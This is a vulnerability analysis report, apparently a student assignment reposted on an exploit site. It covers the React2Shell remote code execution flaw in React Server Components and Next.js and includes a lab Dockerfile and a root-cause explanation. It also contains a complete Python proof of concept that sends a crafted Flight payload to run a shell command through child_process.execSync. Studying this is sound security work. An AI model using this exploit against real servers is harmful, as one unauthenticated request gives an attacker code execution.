Share
## https://sploitus.com/exploit?id=BEBC4DAE-79DC-5330-BAF0-012C7FAF4527
# CVE-2025-55182 React2Shell Analysis Report

> Sections required by the assignment guidelines are marked with โ€œ(Required)โ€.

# 1. Environment (Required)

## Dockerfile (Required)

This environment uses a custom Dockerfile based on the official Node.js Alpine image.

```dockerfile
FROM node:20-alpine

WORKDIR /app

COPY package.json ./
RUN npm install --legacy-peer-deps

COPY . .


EXPOSE 3000

CMD ["npm", "run", "dev"]
```

The Dockerfile builds a vulnerable React Server Components (RSC) and Next.js App Router environment.

The environment installs vulnerable versions of:

* React 19 RC
* React Server DOM Webpack
* Next.js 15.0.0

The vulnerable server runs in development mode using `npm run dev`.

The vulnerable server runs in development mode using `npm run dev`.

---

## Service Architecture (Required)

The environment operates using the following structure:

```plaintext
[Attacker / exploit.py]
          โ†“
[Next.js App Router]
          โ†“
[React Flight Protocol Parser]
          โ†“
[React Server Components Runtime]
          โ†“
[Node.js Runtime]
```

### Attacker / exploit.py

The attacker sends a specially crafted `multipart/form-data` request to the vulnerable Next.js application.

The malicious payload abuses the React Flight protocol deserialization process.

### Next.js App Router

The vulnerable application uses the Next.js App Router architecture.

The request is processed through the React Server Components pipeline.

### React Flight Protocol Parser

The Flight protocol deserializes complex React objects such as:

* Promise references
* Blob references
* Chunk references
* Server actions
* Circular references

The vulnerability occurs during this deserialization process.

### React Server Components Runtime

The React runtime processes attacker-controlled Flight payloads.

Unsafe property traversal and prototype access eventually allow attackers to hijack the Function constructor.

### Node.js Runtime

After successful exploitation, arbitrary JavaScript code executes inside the Node.js server environment.

This leads to Remote Code Execution (RCE).

---

## Images and Versions (Required)

| Component                | Version   |
| ------------------------ | --------- |
| Node.js                  | 20-alpine |
| Next.js                  | 15.0.0    |
| React                    | 19.0.0-rc |
| react-dom                | 19.0.0-rc |
| react-server-dom-webpack | 19.0.0-rc |

The environment uses vulnerable React Server Components and Flight protocol implementations.

# 2. Root Cause (Required)

## Vulnerability Description (Required)

CVE-2025-55182, also known as React2Shell, is a critical Remote Code Execution (RCE) vulnerability affecting React Server Components and the React Flight protocol.

The vulnerability occurs during the deserialization process of attacker-controlled Flight protocol payloads.

The issue allows attackers to:

* create fake chunk objects
* abuse prototype traversal
* hijack the Function constructor
* execute arbitrary JavaScript code on the server

The vulnerability is particularly dangerous because exploitation can occur without authentication using a single crafted HTTP request.

Applications using vulnerable React Server Components and Next.js App Router configurations are directly exposed.

---

## Root Cause Analysis (Required)

The root cause of the vulnerability is unsafe handling of attacker-controlled object references during Flight protocol deserialization.

React Flight internally uses special reference strings such as:

```plaintext
$@0
$B1337
$1:__proto__:then
```

These references are recursively resolved during deserialization.

The vulnerable logic performs property traversal similar to:

```javascript
value[path[i]]
```

without validating whether the property belongs to the object itself.

As a result, attackers can access dangerous JavaScript prototype chain properties such as:

```plaintext
__proto__
constructor
prototype
```

This eventually allows prototype pollution and Function constructor hijacking.

### Fake Chunk Creation

The attacker first creates a fake React chunk object.

```json
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "touch /tmp/success.txt",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
```

The critical field is:

```json
"status": "resolved_model"
```

The React runtime incorrectly trusts this field and treats the attacker-controlled object as a legitimate internal chunk object.

### Prototype Pollution

The payload:

```plaintext
$1:__proto__:then
```

causes the deserializer to traverse the JavaScript prototype chain.

Because the vulnerable code does not validate dangerous properties, the attacker gains access to:

```javascript
Chunk.prototype.then
```

This transforms the fake chunk into a thenable object.

### Function Constructor Hijacking

The payload:

```plaintext
$1:constructor:constructor
```

ultimately resolves to:

```javascript
Function
```

This replaces:

```javascript
response._formData.get
```

with the global JavaScript Function constructor.

As a result:

```javascript
Function(attacker_controlled_payload)
```

becomes possible.

### Blob Parsing Trigger

The payload:

```plaintext
$B1337
```

forces the React Flight parser into the Blob parsing logic.

During this process:

```javascript
response._formData.get(...)
```

is executed.

However, the attacker already replaced this function with the global Function constructor.

This finally results in arbitrary JavaScript execution inside the Node.js runtime.

---

## Vulnerability Trigger Process (Required)

The exploit process occurs in the following order:

```plaintext
Attacker Request
        โ†“
Flight Payload Parsing
        โ†“
Fake Chunk Creation
        โ†“
Prototype Pollution
        โ†“
Function Constructor Hijacking
        โ†“
Blob Parsing Trigger
        โ†“
Promise Resolution
        โ†“
Remote Code Execution
```

The attacker first sends a crafted multipart Flight request.

The vulnerable server deserializes the malicious payload and recursively resolves attacker-controlled references.

Unsafe prototype traversal eventually allows the attacker to hijack the Function constructor.

During Promise resolution and Blob parsing, arbitrary JavaScript code is executed.

---

## Attack Flow and Impact (Required)

Successful exploitation allows attackers to execute arbitrary JavaScript code inside the Node.js server environment.

In this environment, the exploit executes:

```bash
touch /tmp/success.txt
```

Successful exploitation is verified when the following file exists inside the container:

```plaintext
/tmp/success.txt
```

In real-world environments, attackers could:

* execute arbitrary system commands
* download and execute malware
* steal sensitive server data
* pivot to internal infrastructure
* compromise backend systems
* abuse server-side rendering pipelines

The vulnerability is especially dangerous because it affects the React framework internals rather than application business logic.

This means a large number of applications may become vulnerable simply by using affected framework versions.

# 3. PoC (Required)

## PoC Overview (Required)

The Proof of Concept (PoC) was written in Python.

The exploit sends a malicious `multipart/form-data` request directly to the vulnerable Next.js application.

The PoC performs the following actions:

1. Creates a malicious Flight protocol payload
2. Constructs fake React chunk references
3. Triggers prototype traversal
4. Hijacks the Function constructor
5. Executes arbitrary JavaScript code inside the Node.js runtime

---

## PoC Code

```python
import requests
import uuid

boundary = "----WebKitFormBoundary" + uuid.uuid4().hex

payload = f'''------{boundary}
Content-Disposition: form-data; name="0"

{{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{{\\"then\\":\\"$B1337\\"}}","_response":{{"_prefix":"require('child_process').execSync('touch /tmp/success.txt')","_chunks":"$Q2","_formData":{{"get":"$1:constructor:constructor"}}}}}}
------{boundary}
Content-Disposition: form-data; name="1"

"$@0"
------{boundary}
Content-Disposition: form-data; name="2"

[]
------{boundary}--
'''

headers = {
    "Content-Type": f"multipart/form-data; boundary={boundary}",
    "Next-Action": "x"
}

response = requests.post(
    "http://localhost:3000",
    headers=headers,
    data=payload
)

print(response.status_code)
print(response.text)
```

---

## Payload Analysis (Required)

The exploit payload uses multiple specially crafted Flight protocol references.

### `$1:__proto__:then`

| Part        | Purpose                          |
| ----------- | -------------------------------- |
| `$1`        | References chunk 1               |
| `__proto__` | Traverses the prototype chain    |
| `then`      | Retrieves `Chunk.prototype.then` |

This payload transforms the fake chunk into a thenable object.

---

### `$1:constructor:constructor`

| Part          | Purpose                                 |
| ------------- | --------------------------------------- |
| `$1`          | References chunk 1                      |
| `constructor` | Accesses object constructor             |
| `constructor` | Resolves to global Function constructor |

This payload hijacks the JavaScript Function constructor.

---

### `$B1337`

The `$B` prefix forces the Flight parser into the Blob parsing logic.

During this process:

```javascript
response._formData.get(...)
```

is executed.

Because the attacker already replaced this method with the Function constructor, arbitrary JavaScript code executes.

---

### `$@0`

This payload creates a circular chunk reference.

Chunk 1 ultimately references Chunk 0 again.

This structure allows the deserializer to use the attacker-controlled fake chunk object during prototype traversal.

---

## PoC Code Execution Process (Required)

### Boundary Generation

The exploit first creates a random multipart boundary.

```python
boundary = "----WebKitFormBoundary" + uuid.uuid4().hex
```

This is required for constructing a valid multipart/form-data request.

### Fake Chunk Construction

The exploit constructs a malicious fake chunk object.

```json
"status":"resolved_model"
```

This causes the React runtime to treat the attacker-controlled object as a valid internal chunk.

### Prototype Traversal

The following payload:

```plaintext
$1:__proto__:then
```

forces the vulnerable parser to traverse the JavaScript prototype chain.

### Function Constructor Hijacking

The following payload:

```plaintext
$1:constructor:constructor
```

replaces the internal `get` method with the JavaScript Function constructor.

### Arbitrary Code Execution

The payload:

```javascript
require('child_process').execSync('touch /tmp/success.txt')
```

is eventually executed inside the Node.js runtime.

### Expected Result

Successful exploitation creates:

```plaintext
/tmp/success.txt
```

inside the vulnerable container.

# 4. Reproduction (Required)

## PoC and Exploit Execution Process (Required)

The complete exploit flow is summarized below:

```plaintext
Start Docker Environment
        โ†“
Run Vulnerable Next.js Server
        โ†“
Execute exploit.py
        โ†“
Send Malicious Flight Payload
        โ†“
Trigger Prototype Pollution
        โ†“
Hijack Function Constructor
        โ†“
Trigger Blob Parsing
        โ†“
Execute Arbitrary Code
        โ†“
Verify /tmp/success.txt
```

---

## Actual Exploit Execution Steps (Required)

### Building the Vulnerable Environment

Build the Docker image.

```bash
docker build -t rsc-vuln .
```

### Running the Vulnerable Container

Run the vulnerable container.

```bash
docker run -d -p 3000:3000 --name my-vuln-server rsc-vuln
```

The vulnerable Next.js server will run on:

```plaintext
http://127.0.0.1:3000
```

### Running the Exploit

Execute the PoC script.

```bash
python3 exploit.py
```

The exploit sends a malicious React Flight payload to the vulnerable Next.js server.

### Verifying Remote Code Execution

Verify whether the exploit successfully created the target file.

```bash
docker exec -it my-vuln-server ls -la /tmp/success.txt
```

Successful exploitation confirms that arbitrary code execution occurred inside the vulnerable container.

---

## Result Analysis (Required)

### Expected Output

During successful exploitation, the exploit should trigger React Flight deserialization and prototype traversal.

The vulnerable server processes the malicious Flight payload and executes attacker-controlled JavaScript code.

### Successful Exploitation Verification

Successful exploitation is confirmed when the following file exists:

```plaintext
/tmp/success.txt
```

Example output:

```plaintext
-rw-r--r--    1 root     root             0 Jan  1 00:00 /tmp/success.txt
```

This confirms that arbitrary commands were executed successfully inside the vulnerable Node.js environment.

---

## Screenshots (Required)

The following screenshots were included in the `screenshots/` directory:

![Docker Environment](screenshots/1.jpg)

![Exploit Execution](screenshots/2.jpg)